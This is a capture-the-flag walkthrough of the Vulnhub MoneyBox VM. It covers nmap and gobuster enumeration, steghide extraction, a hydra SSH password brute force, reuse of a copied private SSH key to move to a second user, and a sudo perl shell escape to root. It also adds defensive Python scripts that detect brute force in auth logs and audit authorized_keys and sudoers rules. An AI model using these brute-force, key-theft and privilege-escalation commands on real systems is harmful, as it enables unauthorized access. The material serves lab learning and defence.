NepCodeX

Byte Musings: Where Tech Meets Curiosity


MoneyBox Walkthrough – Vulnhub – Writeup


MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so before reading this walkthrough.

Link to the machine: https://www.vulnhub.com/entry/moneybox-1,653/


From this machine, we can learn:

  1. Basic enumeration of HTTP
  2. Steganography using steghide
  3. Basics of SSH
  4. Abusing a sudo rule for root privilege escalation

Identify the target

First of all, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, I scanned the open ports to identify the exposed services.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53

Here, we can see that we have anonymous FTP access. So, I logged into FTP.

Anonymous FTP access

lftp -u anonymous, 10.0.2.53

I downloaded the image to my local machine. Then I tried extracting data with steghide without a passphrase, but it gave me nothing.

steghide extract -sf trytofind.jpg

I also tried brute-forcing the passphrase with stegseek, but that didn’t give me anything either.

stegseek trytofind.jpg /home/kali/rockyou.txt

So I would have to find the steghide passphrase somewhere else.

Enumerate the webserver

The default page doesn’t reveal anything useful.


Brute-forcing directories on the webserver turned up a path.

gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log

Upon curling the path, I found a hint.

curl -L 10.0.2.53/blogs

The response contained a comment pointing to another path.

curl -L 10.0.2.53/S3cr3t-T3xt

Here we got the secret key, which I could use as the steghide passphrase.

Steganography

Steganography is the practice of hiding data inside other files. Since the image is a JPEG, a format steghide supports as a cover file, we can guess that steghide was used to embed the data.

steghide extract -sf trytofind.jpg 

It wrote to a new file “data.txt”. The file had a hint for a username on the target.

cat data.txt
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

The file gives us the username “renu” and tells us the password is weak. Therefore, we might want to brute-force the password.

Brute-force the SSH password

hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh

We were able to crack the password. Hence, I logged in as renu and got the user flag.

ssh renu@10.0.2.53
ls -al
cat user1.txt
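Seen from the defender’s side, the hydra run above leaves a very recognisable trace in sshd’s auth log: a burst of failed password attempts from one source, followed by a successful password login for the same account. The following Python script is an added example for this write-up, not part of the original post. It parses constructed auth.log lines and flags sources whose failures exceed a threshold inside a sliding window, recording which account then accepted a password from that source. The host name, source addresses, PIDs and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in Debian auth.log format; host, source
# addresses, PIDs and timestamps are invented for this example.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 moneybox sshd[1201]: Failed password for renu from 10.0.2.15 port 40110 ssh2
Mar  3 10:15:01 moneybox sshd[1203]: Failed password for renu from 10.0.2.15 port 40112 ssh2
Mar  3 10:15:02 moneybox sshd[1205]: Failed password for renu from 10.0.2.15 port 40114 ssh2
Mar  3 10:15:02 moneybox sshd[1207]: Failed password for renu from 10.0.2.15 port 40116 ssh2
Mar  3 10:15:03 moneybox sshd[1209]: Failed password for renu from 10.0.2.15 port 40118 ssh2
Mar  3 10:15:03 moneybox sshd[1211]: Failed password for invalid user admin from 10.0.2.15 port 40120 ssh2
Mar  3 10:15:04 moneybox sshd[1213]: Accepted password for renu from 10.0.2.15 port 40122 ssh2
Mar  3 10:20:00 moneybox sshd[1300]: Accepted publickey for lily from 10.0.2.15 port 40200 ssh2: RSA SHA256:c0nstructedF1ngerpr1nt
Mar  3 11:00:00 moneybox sshd[1400]: Failed password for lily from 10.0.2.99 port 50000 ssh2
"""

# One regex covers "Failed password", "Accepted password" and "Accepted publickey",
# with or without the "invalid user" marker sshd adds for unknown accounts.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_auth_log(text, year=2021):
    """Return a list of (timestamp, result, method, user, src) per sshd auth line.

    Syslog lines carry no year, so the caller supplies one (assumed 2021 here).
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["src"]))
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Flag sources with at least `threshold` failures inside `window_seconds`.

    Returns {src: {"failures": peak_count, "compromised": [users]}} where
    "compromised" lists accounts that later accepted a *password* from a
    flagged source, the footprint a successful hydra run leaves behind.
    """
    recent = defaultdict(list)  # src -> failure timestamps still inside the window
    findings = {}
    for ts, result, method, user, src in sorted(events):
        if result == "Failed":
            recent[src].append(ts)
            recent[src] = [t for t in recent[src] if (ts - t).total_seconds() <= window_seconds]
            if len(recent[src]) >= threshold:
                entry = findings.setdefault(src, {"failures": 0, "compromised": []})
                entry["failures"] = max(entry["failures"], len(recent[src]))
        elif result == "Accepted" and method == "password" and src in findings:
            if user not in findings[src]["compromised"]:
                findings[src]["compromised"].append(user)
    return findings


def analyze_sample():
    """Run the detector over the constructed log and return its findings."""
    return find_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG))


if __name__ == "__main__":
    for src, info in analyze_sample().items():
        print(f"{src}: {info['failures']} failed logins within the window; "
              f"password later accepted for {info['compromised'] or 'nobody'}")
```

Setting `PasswordAuthentication no` in sshd_config removes this attack path entirely, and fail2ban applies the same threshold logic as a blocking control; a script like this is mainly useful for hunting through historical logs after the fact.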

Escalate to a different user

When I listed the home directories, I found another user on the machine.

cd /home
ls -al

In lily’s home directory there is an .ssh directory.

cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys

The .ssh directory contains an authorized_keys file holding the public SSH key of the user renu. This means that with renu’s private key we can log in as lily. There are two ways to do so. First, we can copy renu’s private key to our local machine and SSH in from there.

scp renu@10.0.2.53:~/.ssh/id_rsa .

The above command copies id_rsa along with its permission bits. This is a better way than serving the key via an HTTP server. Now we can log in.

ssh lily@10.0.2.53 -i ./id_rsa

Alternatively, we can also switch to lily from the target machine itself.

cd
ssh lily@localhost -i .ssh/id_rsa
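The lateral move from renu to lily works only because renu’s public key is listed in lily’s authorized_keys. The audit below is an added example for this write-up, not the original post’s code. It fingerprints every key in the constructed `~/.ssh` files of a set of users, records which accounts accept each key, and reports keys accepted by more than one account together with the user whose `.pub` file marks them as the owner. The key blobs are base64 of labelled text, not real key material.

```python
import base64
import hashlib


def _blob(label):
    """Constructed stand-in for key material: base64 of a label, so it decodes cleanly."""
    return base64.b64encode(label.encode()).decode()


RENU_BLOB = _blob("constructed renu key material, not a real key")
LILY_BLOB = _blob("constructed lily key material, not a real key")

# Constructed sample: user -> contents of the files found in that user's ~/.ssh.
SAMPLE_HOMES = {
    "renu": {
        "id_rsa.pub": f"ssh-rsa {RENU_BLOB} renu@moneybox\n",
        "authorized_keys": f"ssh-rsa {RENU_BLOB} renu@moneybox\n",
    },
    "lily": {
        "id_ed25519.pub": f"ssh-ed25519 {LILY_BLOB} lily@moneybox\n",
        "authorized_keys": (
            "# renu's key was dropped in here\n"
            f"ssh-rsa {RENU_BLOB} renu@moneybox\n"
            f'from="10.0.2.0/24" ssh-ed25519 {LILY_BLOB} lily@moneybox\n'
        ),
    },
}

KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint (unpadded base64) of a decoded key blob."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_key_line(line):
    """Return (fingerprint, comment) for one authorized_keys or .pub line, else None.

    Skips blanks and comments and tolerates an options prefix such as from="...".
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            try:
                blob = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:
                return None  # malformed blob; not a usable key line
            return fingerprint(blob), " ".join(tokens[i + 2:])
    return None


def audit(homes):
    """Return keys accepted by more than one account, with the probable owner."""
    owners = {}    # fingerprint -> user whose *.pub file holds that key
    accepted = {}  # fingerprint -> {"comment": str, "accounts": set}
    for user, files in homes.items():
        for name, text in files.items():
            for line in text.splitlines():
                parsed = parse_key_line(line)
                if parsed is None:
                    continue
                fp, comment = parsed
                if name.endswith(".pub"):
                    owners[fp] = user
                elif name == "authorized_keys":
                    entry = accepted.setdefault(fp, {"comment": comment, "accounts": set()})
                    entry["accounts"].add(user)
    return [
        {
            "fingerprint": fp,
            "comment": entry["comment"],
            "owner": owners.get(fp, "unknown"),
            "accounts": sorted(entry["accounts"]),
        }
        for fp, entry in accepted.items()
        if len(entry["accounts"]) > 1
    ]


def audit_sample():
    return audit(SAMPLE_HOMES)


if __name__ == "__main__":
    for finding in audit_sample():
        print(f"{finding['fingerprint']} ({finding['comment']}) owned by {finding['owner']} "
              f"is accepted by: {', '.join(finding['accounts'])}")
```

On a real host, the `homes` dictionary would be built by reading `/home/*/.ssh/` as root; any key that unlocks two accounts should either be removed from the second account or restricted with options such as `from=` and `command=`.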

From here we can get the second user flag.

cat user2.txt

Root privilege escalation

From lily, we can check the sudo permissions.

sudo -l

We can see that lily can run the perl command as any user via sudo. Since perl can execute other programs, this lets us run commands as root.

References: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt
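The root step rests on a single sudo rule that lets lily run an interpreter with any arguments. The script below is an added example for this write-up, not from the original post: it parses a constructed sudoers excerpt and flags rules of that shape, namely commands listed as ALL, or a shell-capable program listed without an argument pattern (sudo then permits any arguments, which is exactly what the perl one-liner relies on). Only lily’s rule mirrors the machine; the other sample rules are invented for contrast.

```python
import re

# Constructed /etc/sudoers excerpt. lily's rule mirrors the MoneyBox finding;
# the remaining rules are invented to show what does and does not get flagged.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
lily    ALL=(ALL) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
deploy  ALL=(www-data) /usr/bin/systemctl restart nginx   # restart only
"""

# Programs that hand back an interactive shell when run under sudo (the class
# GTFOBins catalogues); extend to taste.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "zsh",
                 "vi", "vim", "less", "more", "find", "awk", "env", "nmap"}

# Tags that may precede a command in a sudoers command spec.
TAGS = {"NOPASSWD:", "PASSWD:", "NOEXEC:", "EXEC:", "SETENV:", "NOSETENV:",
        "LOG_INPUT:", "NOLOG_INPUT:", "LOG_OUTPUT:", "NOLOG_OUTPUT:"}

# user  host = (runas_user[:runas_group]) cmd1, cmd2 ...   (runas part optional)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_rules(text):
    """Expand sudoers user specs into one dict per command; Defaults lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # No runas list means root; "(:group)" with an empty user part also means root.
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"
        for spec in m["cmds"].split(","):
            tokens = spec.split()
            rules.append({
                "who": m["who"],
                "runas": runas,
                "nopasswd": "NOPASSWD:" in tokens,
                "command": " ".join(t for t in tokens if t not in TAGS),
            })
    return rules


def assess(rule):
    """Return a reason string when the rule yields a shell as the runas user, else None."""
    if rule["who"] == "root":
        return None  # root already has everything; nothing to escalate
    cmd = rule["command"]
    if cmd == "ALL":
        return "grants ALL commands"
    words = cmd.split()
    program = words[0].rsplit("/", 1)[-1]
    if program in SHELL_CAPABLE and len(words) == 1:
        # A command listed without arguments accepts *any* arguments, so an
        # interpreter can simply be told to exec a shell.
        reason = f"{program} runs with arbitrary arguments and can spawn a shell"
        if rule["nopasswd"]:
            reason += "; NOPASSWD so no credential needed"
        return reason
    return None


def audit(text):
    findings = []
    for rule in parse_rules(text):
        reason = assess(rule)
        if reason:
            findings.append({"who": rule["who"], "runas": rule["runas"],
                             "command": rule["command"], "reason": reason})
    return findings


def audit_sample():
    return audit(SAMPLE_SUDOERS)


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['who']} -> ({f['runas']}) {f['command']}: {f['reason']}")
```

In a real review, run it over `/etc/sudoers` and every file in `/etc/sudoers.d/` after `visudo -c` confirms they parse, and fix a flagged rule by pinning the exact command line (or removing the entry) rather than relying on the interpreter being well behaved.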

